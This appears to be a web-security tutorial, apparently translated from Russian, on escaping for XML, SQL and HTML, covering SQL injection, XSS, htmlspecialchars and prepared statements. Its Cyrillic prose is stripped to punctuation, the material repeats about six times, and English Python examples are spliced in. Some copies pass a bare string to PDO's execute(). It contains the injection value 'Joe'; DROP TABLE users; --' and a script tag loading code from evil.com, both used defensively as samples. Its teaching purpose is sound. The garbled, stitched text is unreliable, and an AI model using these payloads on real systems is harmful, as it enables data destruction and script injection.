$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

, "" . SQL-, :

Alex
    SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds
    SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --
    SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string



, - .



, :

<div class="post">
    <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
    </p>
</div>

htmlspecialchars



, , . :

<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
    </p>
</div>

, , , "". HTML .
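As an added example (my code, not the article's), one entity-escaping routine applied to both the XML <contents> case and the HTML post template above; the templates, the ordering check and the script detector are assumptions of mine, and the sample posts are the article's.

```python
import html
import re

# Replacement table for text placed inside XML/HTML. '&' must come first:
# every later replacement introduces a new '&', which must not be re-escaped.
MARKUP_ESCAPES = [("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"), ('"', "&quot;")]


def escape_markup(text: str) -> str:
    """Escape text for XML/HTML character data or a double-quoted attribute.

    Same character set as PHP's htmlspecialchars() in the article; the single
    quote is left alone, so escaped values belong in double-quoted attributes.
    """
    for raw, entity in MARKUP_ESCAPES:
        text = text.replace(raw, entity)
    return text


def escape_markup_wrong_order(text: str) -> str:
    """Same table, '&' handled last: '<' ends up as '&amp;lt;' (double-escaped)."""
    for raw, entity in reversed(MARKUP_ESCAPES):
        text = text.replace(raw, entity)
    return text


def round_trips(text: str) -> bool:
    """A parser reading the escaped form must recover exactly the original."""
    return html.unescape(escape_markup(text)) == text


# Templates mirroring the article's XML document and PHP post snippet
# (assumed layout; the whitespace is mine).
XML_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" ?>\n'
    "<article>\n"
    "  <author>{author}</author>\n"
    "  <contents>{contents}</contents>\n"
    "</article>\n"
)

POST_TEMPLATE = (
    '<div class="post">\n'
    '  <p class="meta">Posted by {user} on {date}</p>\n'
    '  <p class="body">{body}</p>\n'
    "</div>\n"
)


def render_xml(author: str, contents: str) -> str:
    """Escape at the point of insertion, never when the value is stored."""
    return XML_TEMPLATE.format(author=escape_markup(author),
                               contents=escape_markup(contents))


def render_post(user: str, date: str, body: str, escape: bool = True) -> str:
    """escape=False reproduces the article's vulnerable 'echo $post[...]' template."""
    fix = escape_markup if escape else (lambda s: s)
    return POST_TEMPLATE.format(user=fix(user), date=fix(date), body=fix(body))


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(rendered: str) -> bool:
    """True if an actual <script tag (not the text '&lt;script') is in the output."""
    return _SCRIPT_TAG.search(rendered) is not None


# Sample posts taken from the article's examples.
PASCAL_BODY = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
JACKTR_BODY = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')

if __name__ == "__main__":
    print(render_xml("Homo Sapiens", PASCAL_BODY))
    for user, body in (("Pascal", PASCAL_BODY), ("JackTR", JACKTR_BODY)):
        page = render_post(user, "July 18, 12:56", body)
        print(page, "live script:", contains_live_script(page))
    print("wrong order:", escape_markup_wrong_order("x < n"))
```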



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes an array of parameter values, one per placeholder;
// the value is sent separately from the SQL text and is never spliced into it.
$stmt->execute([$_POST['name']]);

, . , .
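As an added example (my code, not the article's), the three inputs from the tables above run through naive string building, mysql_real_escape_string-style escaping and a parameterised query, in Python against an in-memory SQLite table; the table, its rows and the phone numbers are constructed.

```python
import sqlite3

# The three inputs from the article's tables.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def build_query_naive(name: str) -> str:
    """What the article's first PHP snippet does: paste the value into the SQL."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def escape_sql_string(value: str) -> str:
    """Backslash escaping in the style of mysql_real_escape_string (subset).

    The escape character itself is handled first; otherwise the backslash
    added in front of a quote would itself be escaped on the next pass.
    MySQL understands this form, SQLite does not (it doubles quotes instead),
    which is one reason hand escaping is tied to a single database dialect.
    """
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query_escaped(name: str) -> str:
    """The article's second PHP snippet: escape, then paste."""
    return f"SELECT phone_number FROM users WHERE name = '{escape_sql_string(name)}'"


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (phone numbers are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0100"), ("Mc'Donalds", "555-0101")])
    conn.commit()
    return conn


def lookup_naive(conn: sqlite3.Connection, name: str):
    """Run the pasted-together query; returns (rows, error message or None).

    With a quote in the input the SQL no longer parses. With the third input
    the Python sqlite3 driver refuses to run two statements in one call, and
    that driver rule is the only thing between this code and a dropped table.
    """
    try:
        return conn.execute(build_query_naive(name)).fetchall(), None
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return [], str(exc)


def lookup_param(conn: sqlite3.Connection, name: str) -> list:
    """Prepared statement: the SQL text is fixed, the value travels separately."""
    return conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,)
    ).fetchall()


def users_table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    for name in INPUTS:
        print("input:       ", name)
        print("naive SQL:   ", build_query_naive(name))
        print("escaped SQL: ", build_query_escaped(name))
        print("naive result:", lookup_naive(conn, name))
        print("param result:", lookup_param(conn, name))
        print()
    print("users table still exists:", users_table_exists(conn))
```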





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

